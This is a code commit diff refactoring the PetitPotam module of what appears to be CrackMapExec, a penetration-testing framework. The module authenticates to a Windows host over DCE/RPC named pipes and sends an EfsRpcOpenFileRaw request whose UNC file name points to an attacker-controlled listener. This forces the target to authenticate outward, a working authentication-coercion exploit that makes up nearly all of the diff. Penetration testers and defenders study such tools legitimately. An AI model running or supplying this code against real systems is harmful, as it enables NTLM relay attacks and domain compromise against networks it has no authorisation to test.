fix(petitpotam): move unneeded class to functions, which also fixes an error when calling

cme/modules/petitpotam.py

@@ -5,6 +5,8 @@
 # Module by @mpgn_x64
 
 import logging
+import sys
+
 from impacket import system_errors
 from impacket.dcerpc.v5 import transport
 from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
@@ -34,9 +36,19 @@ class CMEModule:
             self.pipe = module_options['PIPE']
 
     def on_login(self, context, connection):
-        plop = CoerceAuth()
+        dce = coerce(
-        dce = plop.connect(connection.username, password=connection.password, domain=connection.domain, lmhash=connection.lmhash, nthash=connection.nthash, target=connection.host, pipe=self.pipe, targetIp=connection.host, doKerberos=connection.kerberos, dcHost=connection.kdcHost)
+            connection.username,
-        if plop.EfsRpcOpenFileRaw(dce, self.listener):
+            password=connection.password,
+            domain=connection.domain,
+            lmhash=connection.lmhash,
+            nthash=connection.nthash,
+            target=connection.host,
+            pipe=self.pipe,
+            do_kerberos=connection.kerberos,
+            dc_host=connection.kdcHost,
+            target_ip=connection.host
+        )
+        if efs_rpc_open_file_raw(dce, self.listener):
             context.log.highlight("VULNERABLE")
             context.log.highlight("Next step: https://github.com/topotam/PetitPotam")
             try:
@@ -109,6 +121,7 @@ class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
         ('Display', LPWSTR),
     )
 
+
 class ENCRYPTION_CERTIFICATE(NDRSTRUCT):
     structure = (
         ('Lenght', DWORD),
@@ -135,13 +148,6 @@ class ENCRYPTED_FILE_METADATA_SIGNATURE(NDRSTRUCT):
     )
 
 
-class EFS_RPC_BLOB(NDRSTRUCT):
-    structure = (
-        ('Data', DWORD),
-        ('cbData', PCHAR),
-    )
-
-
 class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT):
     align = 1
     structure = (
@@ -179,8 +185,8 @@ class EfsRpcEncryptFileSrvResponse(NDRCALL):
         ('ErrorCode', ULONG),
     )
 
-class CoerceAuth:
+
-    def connect(self, username, password, domain, lmhash, nthash, target, pipe, targetIp, doKerberos, dcHost):
+def coerce(username, password, domain, lmhash, nthash, target, pipe, do_kerberos, dc_host, target_ip=None):
     binding_params = {
         'lsarpc': {
             'stringBinding': r'ncacn_np:%s[\PIPE\lsarpc]' % target,
@@ -203,19 +209,19 @@ class CoerceAuth:
             'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
         },
     }
-        rpctransport = transport.DCERPCTransportFactory(binding_params[pipe]['stringBinding'])
+    rpc_transport = transport.DCERPCTransportFactory(binding_params[pipe]['stringBinding'])
-        if hasattr(rpctransport, 'set_credentials'):
+    if hasattr(rpc_transport, 'set_credentials'):
-            rpctransport.set_credentials(username=username, password=password, domain=domain, lmhash=lmhash, nthash=nthash)
+        rpc_transport.set_credentials(username=username, password=password, domain=domain, lmhash=lmhash, nthash=nthash)
 
-        if targetIp:
+    if target_ip:
-            rpctransport.setRemoteHost(targetIp)
+        rpc_transport.setRemoteHost(target_ip)
 
-        dce = rpctransport.get_dce_rpc()
+    dce = rpc_transport.get_dce_rpc()
     dce.set_auth_type(RPC_C_AUTHN_WINNT)
     dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
 
-        if doKerberos:
+    if do_kerberos:
-            rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
+        rpc_transport.set_kerberos(do_kerberos, kdcHost=dc_host)
         dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
 
     logging.debug("[-] Connecting to %s" % binding_params[pipe]['stringBinding'])
@@ -234,13 +240,13 @@ class CoerceAuth:
     logging.debug("[+] Successfully bound!")
     return dce
 
-    def EfsRpcOpenFileRaw(self, dce, listener):
+
+def efs_rpc_open_file_raw(dce, listener):
     logging.debug("[-] Sending EfsRpcOpenFileRaw!")
     try:
         request = EfsRpcOpenFileRaw()
         request['fileName'] = '\\\\%s\\test\\Settings.ini\x00' % listener
         request['Flag'] = 0
-            #request.dump()
         resp = dce.request(request)
 
     except Exception as e: